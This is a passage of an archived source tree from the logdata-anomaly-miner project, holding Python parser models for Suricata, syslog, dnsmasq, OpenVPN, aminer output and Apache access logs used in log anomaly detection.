FixedDataModelElement("stream_depth_reached_str", b',"stream_depth_reached":'), DecimalIntegerValueModelElement("stream_depth_reached"), FixedDataModelElement("reassembly_gap_str", b',"reassembly_gap":'), DecimalIntegerValueModelElement("reassembly_gap"), FixedDataModelElement("memuse_str", b',"memuse":'), DecimalIntegerValueModelElement("memuse"), FixedDataModelElement("reassembly_memuse_str", b',"reassembly_memuse":'), DecimalIntegerValueModelElement("reassembly_memuse"), ]), SequenceModelElement("detect", [ FixedDataModelElement("alert_str", b'},"detect":{"alert":'), DecimalIntegerValueModelElement("alert") ]), SequenceModelElement("app_layer", [ SequenceModelElement("flow", [ FixedDataModelElement("http_str", b'},"app_layer":{"flow":{"http":'), DecimalIntegerValueModelElement("http"), FixedDataModelElement("ftp_str", b',"ftp":'), DecimalIntegerValueModelElement("ftp"), FixedDataModelElement("smtp_str", b',"smtp":'), DecimalIntegerValueModelElement("smtp"), FixedDataModelElement("tls_str", b',"tls":'), DecimalIntegerValueModelElement("tls"), FixedDataModelElement("ssh_str", b',"ssh":'), DecimalIntegerValueModelElement("ssh"), FixedDataModelElement("imap_str", b',"imap":'), DecimalIntegerValueModelElement("imap"), FixedDataModelElement("msn_str", b',"msn":'), DecimalIntegerValueModelElement("msn"), FixedDataModelElement("smb_str", b',"smb":'), DecimalIntegerValueModelElement("smb"), FixedDataModelElement("dcerpc_tcp_str", b',"dcerpc_tcp":'), DecimalIntegerValueModelElement("dcerpc_tcp"), FixedDataModelElement("dns_tcp_str", b',"dns_tcp":'), DecimalIntegerValueModelElement("dns_tcp"), FixedDataModelElement("failed_tcp_str", b',"failed_tcp":'), DecimalIntegerValueModelElement("failed_tcp"), FixedDataModelElement("dcerpc_udp_str", b',"dcerpc_udp":'), DecimalIntegerValueModelElement("dcerpc_udp"), FixedDataModelElement("dns_udp_str", b',"dns_udp":'), DecimalIntegerValueModelElement("dns_udp"), FixedDataModelElement("failed_udp_str", b',"failed_udp":'), DecimalIntegerValueModelElement("failed_udp"), ]), SequenceModelElement("tx", [ FixedDataModelElement("http_str", b'},"tx":{"http":'), DecimalIntegerValueModelElement("http"), FixedDataModelElement("smtp_str", b',"smtp":'), DecimalIntegerValueModelElement("smtp"), FixedDataModelElement("tls_str", b',"tls":'), DecimalIntegerValueModelElement("tls"), FixedDataModelElement("dns_tcp_str", b',"dns_tcp":'), DecimalIntegerValueModelElement("dns_tcp"), FixedDataModelElement("dns_udp_str", b',"dns_udp":'), DecimalIntegerValueModelElement("dns_udp"), ]) ]), SequenceModelElement("flow_mgr", [ FixedDataModelElement("closed_pruned_str", b'}},"flow_mgr":{"closed_pruned":'), DecimalIntegerValueModelElement("closed_pruned"), FixedDataModelElement("new_pruned_str", b',"new_pruned":'), DecimalIntegerValueModelElement("new_pruned"), FixedDataModelElement("est_pruned_str", b',"est_pruned":'), DecimalIntegerValueModelElement("est_pruned"), FixedDataModelElement("bypassed_pruned_str", b',"bypassed_pruned":'), DecimalIntegerValueModelElement("bypassed_pruned"), FixedDataModelElement("flows_checked_str", b',"flows_checked":'), DecimalIntegerValueModelElement("flows_checked"), FixedDataModelElement("flows_notimeout_str", b',"flows_notimeout":'), DecimalIntegerValueModelElement("flows_notimeout"), FixedDataModelElement("flows_timeout_str", b',"flows_timeout":'), DecimalIntegerValueModelElement("flows_timeout"), FixedDataModelElement("flows_timeout_inuse_str", b',"flows_timeout_inuse":'), DecimalIntegerValueModelElement("flows_timeout_inuse"), FixedDataModelElement("flows_removed_str", b',"flows_removed":'), DecimalIntegerValueModelElement("flows_removed"), FixedDataModelElement("rows_checked_str", b',"rows_checked":'), DecimalIntegerValueModelElement("rows_checked"), FixedDataModelElement("rows_skipped_str", b',"rows_skipped":'), DecimalIntegerValueModelElement("rows_skipped"), FixedDataModelElement("rows_empty_str", b',"rows_empty":'), DecimalIntegerValueModelElement("rows_empty"), FixedDataModelElement("rows_busy_str", b',"rows_busy":'), DecimalIntegerValueModelElement("rows_busy"), FixedDataModelElement("rows_maxlen_str", b',"rows_maxlen":'), DecimalIntegerValueModelElement("rows_maxlen"), ]), SequenceModelElement("dns", [ FixedDataModelElement("memuse_str", b'},"dns":{"memuse":'), DecimalIntegerValueModelElement("memuse"), FixedDataModelElement("memcap_state_str", b',"memcap_state":'), DecimalIntegerValueModelElement("memcap_state"), FixedDataModelElement("memcap_global_str", b',"memcap_global":'), DecimalIntegerValueModelElement("memcap_global"), ]), SequenceModelElement("http", [ FixedDataModelElement("memuse_str", b'},"http":{"memuse":'), DecimalIntegerValueModelElement("memuse"), FixedDataModelElement("memcap_str", b',"memcap":'), DecimalIntegerValueModelElement("memcap"), ]), FixedDataModelElement("quote_str", b"}}}") ]), SequenceModelElement("tls", [ FixedDataModelElement("tls_str", b'tls",'), conn, SequenceModelElement("tls", [ FixedDataModelElement("subject_str", b',"tls":{"subject":"'), DelimitedDataModelElement("subject", b'"'), FixedDataModelElement("issuerdn_str", b'","issuerdn":"'), DelimitedDataModelElement("issuerdn", b'"'), FixedDataModelElement("fingerprint_str", b'","fingerprint":"'), DelimitedDataModelElement("fingerprint", b'"'), OptionalMatchModelElement( "sni", SequenceModelElement("sni", [ FixedDataModelElement("sni_str", b'","sni":"'), DelimitedDataModelElement("sni", b'"'), ]) ), FixedDataModelElement("version_str", b'","version":"'), DelimitedDataModelElement("version", b'"'), FixedDataModelElement("notbefore_str", b'","notbefore":"'), DelimitedDataModelElement("notbefore", b'"'), FixedDataModelElement("notafter_str", b'","notafter":"'), DelimitedDataModelElement("notafter", b'"'), ]), FixedDataModelElement("brack_str", b'"}}') ]), SequenceModelElement("alert", [ FixedDataModelElement("alert_str", b'alert",'), conn, OptionalMatchModelElement( "tx_id", SequenceModelElement("tx_id", [ FixedDataModelElement("tx_id", b',"tx_id":'), DecimalIntegerValueModelElement("tx_id"), ])), SequenceModelElement("alert", [ FixedDataModelElement("action_str", b',"alert":{"action":"'), DelimitedDataModelElement("action", b'"'), FixedDataModelElement("gid_str", b'","gid":'), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("signature_id_str", b',"signature_id":'), DecimalIntegerValueModelElement("signature_id"), FixedDataModelElement("rev_str", b',"rev":'), DecimalIntegerValueModelElement("rev"), FixedDataModelElement("signature_str", b',"signature":"'), DelimitedDataModelElement("signature", b'"'), FixedDataModelElement("category_str", b'","category":"'), DelimitedDataModelElement("category", b'"'), FixedDataModelElement("severity_str", b'","severity":'), DecimalIntegerValueModelElement("severity"), FixedDataModelElement("brack_str", b"}") ]), http, FixedDataModelElement("brack_str", b"}") ]), ]) ]) return model SuricataFastParsingModel.py000066400000000000000000000035341500476301700336140ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds"""This module defines a generated parser model.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement def get_model(): """Return a model to parse Suricata Fast logs from the AIT-LDS.""" model = SequenceModelElement("model", [ DateTimeModelElement("time", b"%m/%d/%Y-%H:%M:%S.%f"), FixedDataModelElement("brack_str1", b" [**] ["), DecimalIntegerValueModelElement("id1"), FixedDataModelElement("sep1", b":"), DecimalIntegerValueModelElement("id2"), FixedDataModelElement("sep2", b":"), DecimalIntegerValueModelElement("id3"), FixedDataModelElement("sep3", b"] "), DelimitedDataModelElement("message", b" [**] "), FixedDataModelElement("classification_str", b" [**] [Classification: "), DelimitedDataModelElement("classification", b"]"), FixedDataModelElement("priority_str", b"] [Priority: "), DecimalIntegerValueModelElement("priority"), FixedDataModelElement("brack_str1", b"] {"), DelimitedDataModelElement("conn", b"}"), FixedDataModelElement("brack_str2", b"} "), IpAddressDataModelElement("src_ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("src_port"), FixedDataModelElement("arrow_str", b" -> "), IpAddressDataModelElement("dst_ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("dst_port"), ]) return model SyslogParsingModelAIT-LDSv1.py000066400000000000000000000004031500476301700337200ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds"""This module defines a generated parser model.""" import SyslogParsingModel def get_model(): """Return a model to parse Syslogs from the AIT-LDS.""" model = SyslogParsingModel.get_model() model.children[0].start_year = 2020 return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds2/000077500000000000000000000000001500476301700265005ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds2/DnsParsingModel.py000066400000000000000000000112521500476301700321040ustar00rootroot00000000000000"""This module defines a generated parser model.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement def get_model(): """Return a model to parse Syslogs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" model = SequenceModelElement("model", [ DateTimeModelElement("time", b"%b %d %H:%M:%S ", start_year=2022), DelimitedDataModelElement("service", b"["), FixedDataModelElement("br_open", b"["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("br_close", b"]: "), FirstMatchModelElement("type", [ SequenceModelElement("query", [ FixedDataModelElement("query", b"query["), VariableByteDataModelElement("record", b"ATXPRMSV"), FixedDataModelElement("br_close", b"] "), DelimitedDataModelElement("domain", b" "), FixedDataModelElement("from", b" from "), IpAddressDataModelElement("ip") ]), SequenceModelElement("reply", [ FixedDataModelElement("reply", b"reply "), DelimitedDataModelElement("domain", b" "), FixedDataModelElement("is", b" is "), VariableByteDataModelElement("ip", alphabet) ]), SequenceModelElement("forwarded", [ FixedDataModelElement("reply", b"forwarded "), DelimitedDataModelElement("domain", b" "), FixedDataModelElement("to", b" to "), IpAddressDataModelElement("ip") ]), SequenceModelElement("nameserver", [ FixedDataModelElement("nameserver", b"nameserver "), IpAddressDataModelElement("ip"), FixedDataModelElement("refused", b" refused to do a recursive query"), ]), SequenceModelElement("nameserver", [ FixedDataModelElement("nameserver", b"using nameserver "), IpAddressDataModelElement("ip"), FixedDataModelElement("port", b"#53"), OptionalMatchModelElement("opt_domain", SequenceModelElement("for_domain", [ FixedDataModelElement("for_domain", b" for domain "), AnyByteDataModelElement("domain") ])) ]), SequenceModelElement("cached", [ FixedDataModelElement("cached", b"cached "), DelimitedDataModelElement("domain", b" "), FixedDataModelElement("is", b" is "), VariableByteDataModelElement("ip", alphabet) ]), SequenceModelElement("reducing", [ FixedDataModelElement("reducing", b"reducing DNS packet size for nameserver "), IpAddressDataModelElement("ip"), FixedDataModelElement("is", b" to "), DecimalIntegerValueModelElement("size") ]), SequenceModelElement("compile_time_options", [ FixedDataModelElement("compile_time_options", b"compile time options: "), AnyByteDataModelElement("options") ]), SequenceModelElement("version", [ FixedDataModelElement("version", b"started, version "), DecimalFloatValueModelElement("version_nr"), FixedDataModelElement("cachesize", b" cachesize "), DecimalIntegerValueModelElement("size") ]), FixedDataModelElement("read_hosts", b"read /etc/hosts - 7 addresses"), FixedDataModelElement("failed_access", b"failed to access /etc/dnsmasq.d/dnsmasq-resolv.conf: No such file or directory"), FixedDataModelElement("version.bind", b"config version.bind is "), FixedDataModelElement("sigterm", b"exiting on receipt of SIGTERM"), ]) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds2/OpenVpnParsingModel.py000066400000000000000000000271131500476301700327500ustar00rootroot00000000000000from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement def get_model(): """Return a model to parse OpenVPN logs from the AIT-LDS2.""" model = SequenceModelElement("model", [ DateTimeModelElement("datetime", b"%Y-%m-%d %H:%M:%S "), OptionalMatchModelElement("user", SequenceModelElement("user", [ DelimitedDataModelElement("user", b"/"), FixedDataModelElement("slash", b"/") ])), IpAddressDataModelElement("ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("port"), FirstMatchModelElement("fm", [ SequenceModelElement("peer_info", [ FixedDataModelElement("peer_info_str", b" peer info: IV_"), FirstMatchModelElement("fm", [ SequenceModelElement("version", [ FixedDataModelElement("version_str", b"VER="), AnyByteDataModelElement("version") ]), SequenceModelElement("platform", [ FixedDataModelElement("platform_str", b"PLAT="), AnyByteDataModelElement("platform") ]), SequenceModelElement("protocol", [ FixedDataModelElement("protocol_str", b"PROTO="), DecimalIntegerValueModelElement("protocol") ]), SequenceModelElement("lz", [ FixedWordlistDataModelElement("lz_str", [b"LZ4=", b"LZ4v2=", b"LZO="]), DecimalIntegerValueModelElement("lz") ]), SequenceModelElement("comp_stub", [ FixedWordlistDataModelElement("comp_stub_str", [b"COMP_STUB=", b"COMP_STUBv2="]), DecimalIntegerValueModelElement("protocol") ]), SequenceModelElement("tcpnl", [ FixedDataModelElement("tcpnl_str", b"TCPNL="), DecimalIntegerValueModelElement("tcpnl") ]), SequenceModelElement("ncp", [ FixedDataModelElement("ncp_str", b"NCP="), DecimalIntegerValueModelElement("ncp") ]), ]) ]), FixedDataModelElement("validating", b" Validating certificate extended key usage"), SequenceModelElement("communication", [ FixedWordlistDataModelElement("direction", [b" Outgoing Data", b" Incoming Data", b" Control"]), FixedDataModelElement("data_channel_str", b" Channel: "), AnyByteDataModelElement("msg") ]), SequenceModelElement("verify", [ FixedDataModelElement("verify_str", b" VERIFY "), FixedWordlistDataModelElement("type", [b"KU", b"EKU"]), FixedDataModelElement("ok_str", b" OK") ]), SequenceModelElement("verify", [ FixedDataModelElement("verify_str", b" VERIFY OK: "), RepeatedElementDataModelElement("cert_data", SequenceModelElement("seq", [ FixedWordlistDataModelElement("attribute", [b"depth", b"ST", b"L", b"O", b"CN", b"C", b"emailAddress"]), FixedDataModelElement("equals_sign", b"="), FirstMatchModelElement("fm", [ SequenceModelElement("data", [ DelimitedDataModelElement("data", b","), FixedDataModelElement("sp", b", ") ]), AnyByteDataModelElement("data") ]), ])) ]), SequenceModelElement("tls", [ FixedDataModelElement("tls_str", b" TLS: "), FirstMatchModelElement("fm", [ SequenceModelElement("soft_reset", [ FixedDataModelElement("soft_reset_str", b"soft reset sec="), DecimalIntegerValueModelElement("sec"), FixedDataModelElement("slash", b"/"), DecimalIntegerValueModelElement("sec"), FixedDataModelElement("bytes_str", b" bytes="), DecimalIntegerValueModelElement("bytes"), FixedDataModelElement("slash", b"/"), DecimalIntegerValueModelElement("bytes", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("pkts_str", b" pkts="), DecimalIntegerValueModelElement("pkts"), FixedDataModelElement("slash", b"/"), DecimalIntegerValueModelElement("pkts") ]), SequenceModelElement("initial_packet", [ FixedDataModelElement("initial_packet_str", b"Initial packet from [AF_INET]"), IpAddressDataModelElement("from_ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("port"), FixedDataModelElement("sid_str", b", sid="), HexStringModelElement("sid1"), FixedDataModelElement("sp", b" "), HexStringModelElement("sid2") ]), SequenceModelElement("move_session", [ FixedDataModelElement("move_session_str", b"move_session: dest="), DelimitedDataModelElement("dest", b" "), FixedDataModelElement("src_str", b" src="), DelimitedDataModelElement("src", b" "), FixedDataModelElement("reinit_src_str", b" reinit_src="), DecimalIntegerValueModelElement("reinit_src") ]) ]) ]), SequenceModelElement("tls_error", [ FixedDataModelElement("error_str", b" TLS Error: "), FirstMatchModelElement("fm", [ FixedDataModelElement("negotiation_failed", b"TLS key negotiation failed to occur within 60 seconds (check your network connectivity)"), FixedDataModelElement("handshake_failed", b"TLS handshake failed") ]) ]), SequenceModelElement("multi", [ FixedDataModelElement("multi_str", b" MULTI: "), FirstMatchModelElement("fm", [ SequenceModelElement("learn", [ FixedDataModelElement("learn_str", b"Learn: "), IpAddressDataModelElement("ip1"), FixedDataModelElement("arrow", b" -> "), DelimitedDataModelElement("name", b"/"), FixedDataModelElement("slash", b"/"), IpAddressDataModelElement("ip2"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("port") ]), SequenceModelElement("primary", [ FixedDataModelElement("primary_str", b"primary virtual IP for "), DelimitedDataModelElement("name", b"/"), FixedDataModelElement("slash", b"/"), IpAddressDataModelElement("ip1"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("port"), FixedDataModelElement("colon", b": "), IpAddressDataModelElement("ip2") ]), ]) ]), SequenceModelElement("multi_sva", [ FixedDataModelElement("multi_str", b" MULTI_sva: "), FirstMatchModelElement("fm", [ SequenceModelElement("pool_returned", [ FixedDataModelElement("pool_returned_str", b"pool returned IPv4="), IpAddressDataModelElement("ip"), FixedDataModelElement("ipv6_str", b", IPv6="), FirstMatchModelElement("fm", [ FixedDataModelElement("not_enabled", b"(Not enabled)"), IpAddressDataModelElement("ipv6", ipv6=True) ]) ]), SequenceModelElement("primary", [ FixedDataModelElement("primary_str", b"primary virtual IP for "), DelimitedDataModelElement("name", b"/"), FixedDataModelElement("slash", b"/"), IpAddressDataModelElement("ip1"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("port"), FixedDataModelElement("colon", b": "), IpAddressDataModelElement("ip2") ]), ]) ]), SequenceModelElement("activity", [ FixedDataModelElement("open_bracket", b" ["), DelimitedDataModelElement("name", b"]"), FixedDataModelElement("close_bracket", b"] "), FirstMatchModelElement("fm", [ FixedDataModelElement("inactivity_timeout", b"Inactivity timeout (--ping-restart), restarting"), SequenceModelElement("peer_conn_initiated", [ FixedDataModelElement("peer_conn_initiated_str", b"Peer Connection Initiated with [AF_INET]"), IpAddressDataModelElement("ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("port") ]), ]) ]), SequenceModelElement("sent_control", [ FixedDataModelElement("sent_control_str", b" SENT CONTROL ["), DelimitedDataModelElement("name", b"]"), FixedDataModelElement("bracket", b"]: "), AnyByteDataModelElement("msg") ]), FixedDataModelElement("client_auth_expected", b" ++ Certificate has EKU (str) TLS Web Client Authentication, expects TLS Web Client Authentication"), FixedDataModelElement("push", b" PUSH: Received control message: 'PUSH_REQUEST'"), FixedDataModelElement("SIGUSR1", b" SIGUSR1[soft,ping-restart] received, client-instance restarting") ]) ]) return model SyslogParsingModelAIT-LDSv2.py000066400000000000000000000004031500476301700340030ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds2"""This module defines a generated parser model.""" import SyslogParsingModel def get_model(): """Return a model to parse Syslogs from the AIT-LDS.""" model = SyslogParsingModel.get_model() model.children[0].start_year = 2022 return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/000077500000000000000000000000001500476301700264755ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/AminerParsingModel.py000066400000000000000000000244551500476301700326010ustar00rootroot00000000000000"""This module defines a parser for the aminer.""" from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.JsonModelElement import JsonModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement def get_model(): """Return the model.""" name_alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" alphabet = "!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[] °§ß–\n".encode() alphabet_with_newline = alphabet + b"\n" filename_alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 ._-/" path = VariableByteDataModelElement("path", filename_alphabet) apostrophe = FixedDataModelElement("apostrophe", b"'") repeated_path = RepeatedElementDataModelElement("repeated", SequenceModelElement("sequence", [ apostrophe, path, apostrophe, OptionalMatchModelElement("optional", FixedDataModelElement("comma", b",")) ])) rule = SequenceModelElement("rule", [ FixedDataModelElement("open_bracket", b"("), repeated_path, FixedWordlistDataModelElement("close_bracket", [b")->(", b")<-("]), repeated_path, FixedDataModelElement("close_bracket", b")") ]) expected = SequenceModelElement("expected", [ DecimalIntegerValueModelElement("actual"), FixedDataModelElement("slash", b"/"), DecimalIntegerValueModelElement("expected") ]) observed = SequenceModelElement("observed", [ DecimalIntegerValueModelElement("actual"), FixedDataModelElement("slash", b"/"), DecimalIntegerValueModelElement("expected") ]) has_outlier_bins_flag = FixedWordlistDataModelElement("has_outlier_bins_flag", [b"true", b"false"]) model = JsonModelElement("aminer", { "_AnalysisComponent": { "AnalysisComponentIdentifier": FirstMatchModelElement("first", [ DecimalIntegerValueModelElement("component_id"), FixedDataModelElement("null", b"null") ]), "AnalysisComponentType": VariableByteDataModelElement("component_type", name_alphabet), "AnalysisComponentName": VariableByteDataModelElement("component_name", alphabet), "Message": VariableByteDataModelElement("message", alphabet), "_PersistenceFileName": VariableByteDataModelElement("persistence_file_name", filename_alphabet), "_TrainingMode": FixedWordlistDataModelElement("training_mode", [b"true", b"false"]), "_AffectedLogAtomPaths": [VariableByteDataModelElement("affected_log_atom_paths", alphabet)], "_AffectedLogAtomValues": [VariableByteDataModelElement("affected_log_atom_value", alphabet)], "_Metadata": { "TimeFirstOccurrence": DecimalFloatValueModelElement("time_first_occurrence"), "TimeLastOccurrence": DecimalFloatValueModelElement("time_last_occurrence"), "NumberOfOccurrences": DecimalIntegerValueModelElement("number_of_occurrences") }, "_ParsedLogAtom": {"ALLOW_ALL_KEYS": VariableByteDataModelElement("allow_all_keys", alphabet)}, "_FeatureList": [{ "Rule": { "type": VariableByteDataModelElement("type", name_alphabet), "path": path, "_value": VariableByteDataModelElement("value", alphabet), "match_action": VariableByteDataModelElement("match_action", filename_alphabet), "log_total": DecimalIntegerValueModelElement("log_total"), "log_success": DecimalIntegerValueModelElement("log_success") }, "Index": DecimalIntegerValueModelElement("index"), "CreationTime": DecimalFloatValueModelElement("creation_time"), "LastTriggerTime": DecimalFloatValueModelElement("last_trigger_time"), "TriggerCount": DecimalIntegerValueModelElement("trigger_count") }], "_AnalysisStatus": VariableByteDataModelElement("analysis_status", alphabet), "_TotalRecords": DecimalIntegerValueModelElement("total_records"), "_HistogramData": [{ "TotalElements": DecimalIntegerValueModelElement("total_elements"), "BinnedElements": DecimalIntegerValueModelElement("binned_elements"), "HasOutlierBinsFlag": has_outlier_bins_flag, "Bins": {"ALLOW_ALL_KEYS": DecimalIntegerValueModelElement("bin")}, "BinDefinition": { "Type": FixedWordlistDataModelElement("type", [b"ModuloTimeBinDefinition", b"LinearNumericBinDefinition"]), "LowerLimit": DecimalIntegerValueModelElement("lower_limit"), "BinSize": DecimalIntegerValueModelElement("bin_size"), "BinCount": DecimalIntegerValueModelElement("bin_count"), "OutlierBinsFlag": has_outlier_bins_flag, "BinNames": [ SequenceModelElement("bin_names", [ FirstMatchModelElement("first", [ SequenceModelElement("lower", [ FixedDataModelElement("open_bracket", b"["), DecimalIntegerValueModelElement("value") ]), FixedDataModelElement("dots", b"...") ]), FixedDataModelElement("hyphen", b"-"), FirstMatchModelElement("first", [ SequenceModelElement("upper", [ DecimalIntegerValueModelElement("value"), FixedDataModelElement("close_bracket", b"]") ]), FixedDataModelElement("dots", b"...") ]), ]) ], "ExpectedBinRatio": DecimalFloatValueModelElement("expected_bin_ratio"), "_ModuloValue": DecimalIntegerValueModelElement("modulo_value"), "_TimeUnit": DecimalIntegerValueModelElement("time_unit") }, "PropertyPath": VariableByteDataModelElement("property_path", filename_alphabet), }], "_ReportInterval": DecimalIntegerValueModelElement("report_interval"), "_ResetAfterReportFlag": FixedWordlistDataModelElement("reset_after_report_flag", [b"true", b"false"]), "_MissingPaths": [VariableByteDataModelElement("missing_paths", alphabet)], "_AnomalyScores": [{ "Path": path, "AnalysisData": { "New": { "N": DecimalIntegerValueModelElement("n"), "Avg": DecimalFloatValueModelElement("avg"), "Var": DecimalFloatValueModelElement("var") }, "Old": { "N": DecimalIntegerValueModelElement("n"), "Avg": DecimalFloatValueModelElement("avg"), "Var": DecimalFloatValueModelElement("var") } } }], "_MinBinElements": DecimalIntegerValueModelElement("min_bin_elements"), "_MinBinTime": DecimalIntegerValueModelElement("min_bin_time"), "_DebugMode": FixedWordlistDataModelElement("debug_mode", [b"true", b"false"]), "_Rule": { "RuleId": VariableByteDataModelElement("id", filename_alphabet), "MinTimeDelta": DecimalIntegerValueModelElement("min_time_delta"), "MaxTimeDelta": DecimalIntegerValueModelElement("max_time_delta"), "ArtefactMatchParameters": [ path ], "HistoryAEvents": "EMPTY_ARRAY", "HistoryBEvents": "EMPTY_ARRAY", "LastTimestampSeen": DecimalFloatValueModelElement("last_timestamp_seen"), "correlation_history": { "MaxItems": DecimalIntegerValueModelElement("max_items"), "History": [ VariableByteDataModelElement("value", alphabet) ] } }, "_CheckResult": [VariableByteDataModelElement("value", alphabet_with_newline)], "_NewestTimestamp": DecimalFloatValueModelElement("newest_timestamp") }, "_TotalRecords": DecimalIntegerValueModelElement("total_records"), "_TypeInfo": "ALLOW_ALL", "_RuleInfo": { "Rule": rule, "Expected": expected, "Observed": observed }, "_LogData": { "RawLogData": [VariableByteDataModelElement("raw_log_data", alphabet)], "Timestamps": [DecimalFloatValueModelElement("timestamp")], "DetectionTimestamp": DecimalFloatValueModelElement("detection_timestamp"), "LogLinesCount": DecimalIntegerValueModelElement("lines_count"), "_AnnotatedMatchElement": VariableByteDataModelElement("annotated_match_element", alphabet_with_newline), }, "_StatusInfo": {"ALLOW_ALL_KEYS": { "CurrentProcessedLines": DecimalIntegerValueModelElement("current_processed_lines"), "TotalProcessedLines": DecimalIntegerValueModelElement("total_processed_lines") }}, "_FromTime": DecimalFloatValueModelElement("from_time"), "_ToTime": DecimalFloatValueModelElement("to_time"), "_DebugLog": [OptionalMatchModelElement("optional", VariableByteDataModelElement("debug_log", alphabet))] }, "_") return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/ApacheAccessModel.py000066400000000000000000000054541500476301700323430ustar00rootroot00000000000000from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement def get_model(): """Return a parser for apache2 access.log.""" alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._-:" new_time_model = DateTimeModelElement("time", b"[%d/%b/%Y:%H:%M:%S%z") host_name_model = VariableByteDataModelElement("host", alphabet) identity_model = VariableByteDataModelElement("ident", alphabet) user_name_model = VariableByteDataModelElement("user", b"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz.-") request_method_model = FirstMatchModelElement("fm", [ FixedDataModelElement("dash", b"-"), SequenceModelElement("request", [ FixedWordlistDataModelElement("method", [ b"GET", b"POST", b"PUT", b"HEAD", b"DELETE", b"CONNECT", b"OPTIONS", b"TRACE", b"PATCH"]), FixedDataModelElement("sp5", b" "), DelimitedDataModelElement("request", b" ", b"\\"), FixedDataModelElement("sp6", b" "), DelimitedDataModelElement("version", b'"'), ]) ]) status_code_model = DecimalIntegerValueModelElement("status") size_model = DecimalIntegerValueModelElement("size") whitespace_str = b" " model = SequenceModelElement("accesslog", [ host_name_model, FixedDataModelElement("sp0", whitespace_str), identity_model, FixedDataModelElement("sp1", whitespace_str), user_name_model, FixedDataModelElement("sp2", whitespace_str), new_time_model, FixedDataModelElement("sp3", b'] "'), request_method_model, 